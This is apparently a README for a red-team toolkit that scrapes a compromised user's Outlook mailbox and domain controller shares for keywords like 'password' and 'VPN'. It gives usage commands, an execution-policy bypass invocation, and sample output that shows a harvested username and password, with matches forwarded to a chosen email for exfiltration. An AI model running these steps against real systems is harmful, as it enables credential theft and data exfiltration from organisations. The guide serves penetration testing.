Brought to you by Neil Lines & Andy Gill at Lares Labs.
Scraping Kit is made up of several tools for scraping services for keywords, useful for initial enumeration of Domain Controllers or if you have popped a user's desktop, their outlook client. Each component has a function that currently supports scraping and emailing the contents to a designated email address for easy exfiltration.
The kit contains two tools currently, with more to come in the coming months and more customisation options.
It helps identify files that contain specific keywords in both emails via the Outlook desk app, and the local domain controller via the Policies and Scripts directories within the SYSVOL folder of an Active Directory domain. It then provides information about the matches and can be used to hunt for potential words such as username and password present in those files.
Read this blog post for more detailed information over on Lares Labs
https://labs.lares.com/introducing-scraping-kit/
- Right-click on the project 'ScrapeKit' under Solution Explorer and select Manage NuGet Packages.
- Click Browse, search for the packages below, and install.
Microsoft.Office.Interop.Outlook" Version="15.0.4797.1004"
MicrosoftOfficeCore" Version="15.0.0"
System.DirectoryServices" Version="7.0.1"
System.DirectoryServices.AccountManagement" Version="7.0.0"
TargetFramework > net6.0
Compile then execute with either PowerShell or CMD, or if you have physical access, double click it. The following menu screen will load.
Please select an option:
1. Run Outlook Email Search
2. Run Active Directory Keyword Search
3. Exit
The Sharp implementation of the tool will pull the domain from environmental variables or if you want to specify it manually it will prompt you to do so.
After selecting option 1, you will be requested to add a destination email address, all matches will be forwarded to the added address.
1. Run Outlook Email Search
2. Run Active Directory Keyword Search
3. Exit
1
Enter the email address to forward matching emails:
dhfrdfdg@REDACTED.com
Would you like to only scrape for the following keywords: 'password', 'security', 'confidential', 'VPN', and 'WIFI' (Y/N)
Y
Matching email found. Forwarded the email information to dhfrdfdg@REDACTED.com
You can select the default keywords or add your own keywords by selecting N at the prompt.
1. Run Outlook Email Search
2. Run Active Directory Keyword Search
3. Exit
1
Enter the email address to forward matching emails:
dhfrdfdg@REDACTED.com
Would you like to only scrape for the following keywords: 'password', 'security', 'confidential', 'VPN', and 'WIFI' (Y/N)
n
Enter additional keywords (comma-separated):
happy1
Matching email found. Forwarded the email information to dhfrdfdg@REDACTED.com
C:\Users\user2>C:\Users\user2\Desktop\ScrapeKit.exe
Please select an option:
1. Run Outlook Email Search
2. Run Active Directory Keyword Search
3. Exit
2
Please provide at least one keyword as a command-line argument.
happy
Match found in file \\WIN-4Q0A4190APL.hacklab.local\SYSVOL\HACKLAB.LOCAL\Scripts\Test1\Herllo.txt!
Additional keywords found in the context:
user
username
name
username:
username:
Context:
sfsfisfjhsf sfjbsfj sf sf
username: happy1
password: test1
PSScrapeKit is a PowerShell implementation of ScrapeKit, it consists of two files; DCScraper & OutlookScrape. Each has a specific function for scraping either a DC or Outlook. The Outlook scraper will connect to the user's Outlook client, search for keywords then queue up any interesting emails and send to an email of your choosing. Whereas the DC one will connect to sysvol and look for specific keywords or a default list.
- DCScrape.ps1
- OutlookScrape.ps1
See PSScrapeKit
Simply import the module then execute it:
ipmo .\OutlookScrape.ps1
Invoke-OutlookScrape
It will give you two options:
Select keyword option:
1. User-defined keywords
2. Default keywords (password, security, confidential, VPN, WIFI)
Enter the keyword option:
Simply select an option then specify an email and the rest will queue up and do its thing.
Invoke-Scrape.ps1
Offers users the following 2 options.
Scrape the Domain Controller - This option will only scrape NETLOGON and SYSVOL directories. Scrape all Domain Shares - This option only scrapes NETLOGON on the DC and then all other readable available domain shares.
SYSVOL contains Group Policies (GPP), if you don’t want to manually review them use option 1.
Invoke-NetShareScrape.ps1
Used to hunt for keywords in files stored across network shares, Invoke-NetShareScrape.ps1 will enumerate all shares the user that executed can access, and then scrape the following file doc formats .txt|.ini|.xml|.bat|.ps1|.doc|.docx|.xlsx|.xls for the user defined keywords.
PS C:\> powershell.exe -nop -exec bypass
PS C:\> Import-Module Invoke-NetShareScrape.ps1
PS C:\> Invoke-NetShareScrape
Enter initial keyword (or press enter to finish):
cat
Enter additional keyword (or press enter to finish):
- Share Scraping Module, similar to snaffler but more opsec safe
- Scraping contents of specific files on DCs/Other hosts
- Other automation and enumeration